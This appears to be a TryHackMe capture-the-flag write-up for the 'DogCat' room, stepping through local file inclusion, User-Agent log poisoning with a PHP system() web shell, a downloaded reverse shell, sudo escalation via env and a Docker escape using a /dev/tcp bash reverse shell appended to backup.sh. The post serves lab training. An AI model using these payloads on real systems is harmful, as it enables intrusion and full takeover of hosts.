Skip to main content

DogCat

Hello guys and welcome to yet another Tryhackme writeup. Today we will be handling a medium room which is accessible here.

Well the methodology is quite similar to the Archangel methodology with quite a twist. Let’s begin.

ACCESSING THE WEBPAGE
#

So I ran an NMAP scan but that was not so productive, so I went directly into the site.

First we see that the site has two buttons which when we click on dog for example, we get a picture of a dog.

1

Looking closely at our URL we see that it is using the view paramater. Well that is interesting. Let us try and traverse that, using the php://filter/convert.base64-encode/resource=./dog/../index.

2

We can then see a base64 code on there. Let us decode it.

3

We get to see some php code which when we look closely at the filters we see that ext can be used to remove the .php which is automatically added at the end of the URL.

ACCESS LOGS
#

Let us use this parameter to view the access logs.

4

Success! Next we are going to try and do some poisoning on the User-Agent using <?php system($_GET['cmd']);?>.

If you are not familiar on how to do that check the Archangel writeup.

Next let us try and run a command using &cmd=whoami

5

We can see that we are www-data.

REVERSE SHELL
#

Now we are going to try and get a reverse shell. We can get one from pentestmonkey. Make sure to make the necessary changes to the ip and port.

Next we are gonna run a python server on our machine using python -m http.server 80. Then run &cmd= curl -o revshell.php ip/revshell.php.

Using wget was not so successfull. We then should check our python server for a 200 status code. With that done we can run our listener on our machine and run &cmd= php revshell.php, then check back on our machine for a connection.

6

Smooth!

ROOT
#

Next we are gonna run sudo -l which checks the SUID capabilities.

7

Well we see that www-data can run the command as root. So looking at GTFO bins we can see that we can exploit this by using sudo env /bin/sh

And we are root.

8

ESCAPING DOCKER
#

This was not straight forward since we are supposed to look for the last flag outside the container. But it is not that hard.

As we are moving around we see a file backup.sh which sort of connects to the Host and the container. We can exploit this by running the following command.

echo "bash -i >& /dev/tcp/ip/port 0>&1" >> backup.sh

Then start up a listener on your machine and success we are in the host.

9

RESOURCES
#

  1. BASH FOR BEGINNERS
  2. PHP TRICKS

Be sure to read the following articles for much better understanding. Happy hacking :)